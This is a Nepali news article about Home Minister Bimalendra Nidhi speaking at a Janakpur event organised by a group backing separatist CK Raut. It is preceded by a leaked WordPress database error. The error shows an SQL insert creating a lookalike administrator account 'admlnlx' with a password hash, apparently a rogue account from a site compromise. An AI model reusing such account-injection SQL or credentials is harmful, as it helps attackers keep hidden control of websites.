WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7fKGYOBb2S4U2Ssh7xpYL1ov02gzB1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 23:44:34', '', 'admlnlx', 'admlnlx')
जनकपुर, फागुन ६ –
उपप्रधान तथा गृहमन्त्री विमलेन्द्र निधि ‘स्वतन्त्र मधेस गठबन्धन’का संयोजक एवं पृथकतावादी अभियन्ता सीके राउत समर्थक संस्थाको कार्यक्रममा प्रमुख अतिथि भएर उपस्थित भएका छन् ।
माघ २४ गते धनुषाको जनकपुरस्थित एक कार्यक्रममा नेपालको अखण्डतासँग खेलबाड गर्नेमाथि कडा कारबाही गर्ने प्रतिबद्धता जनाएका मन्त्री निधि पृथकतावादी सीके राउत समर्थित संस्थाको कार्यक्रममा प्रमुख अतिथिका रुपमा उपस्थित भएका हुन् ।
जनकपुरमा आयोजित कार्यक्रममा उनले कसैले राष्ट्रिय अखण्डतालाई विथोल्न खोजेमा सरकार चुप लागेर नबस्ने चेतावनी समेत दिएका थिए ।
तर, विहिबार (हिजो)देखि जनकपुरमै सुरु भएको सीके राउत पक्षधरको नेपाल–भारत सम्बन्ध सम्वाद कार्यक्रममा उपस्थित भएर गृहमन्त्री निधिले भाषण समेत गर्न भ्याए ।
उक्त कार्यक्रमको आयोजना पृथकतावादी मधेस अभियानमा सक्रिय सीके राउत रिहाइका लागि लबिङ गर्दै आएका पूर्वराजदूत विजयलाल कर्णको संस्था जागृत नेपालले गरेको थियो ।
कार्यक्रममा नेपालका लागि भारतीय पूर्वराजदूत शिवशंकर मुखर्जी, भारतीय राजदूत रञ्जित रे मधेसवादी दलका नेताहरु उपेन्द्र यादव, महन्थ ठाकुर, भाजपा नेता सञ्जय पासवान, सांसद अमरेशकुमार सिंहलगायत सहभागी थिए ।
उनीहरुले नेपालको संविधानमा तीव्र असन्तुष्टि जनाउँदै मधेसीका मुद्दालाई सम्बोधन गर्नुपर्नेमा जोड दिएका थिए ।
कार्यक्रममा मधेसवादी र भारतीय नेताको असन्तुष्टि सुनेका गृहमन्त्री निधिले नेपालको स्वाधीनतालाई भारतले सम्मान गर्नुपर्छ भन्ने आफ्नो मान्यता रहेको स्पष्ट पारे । र, मधेसका मागलाई संविधान संशोधन गरी सम्बोधन गरिने प्रतिबद्धता जनाए ।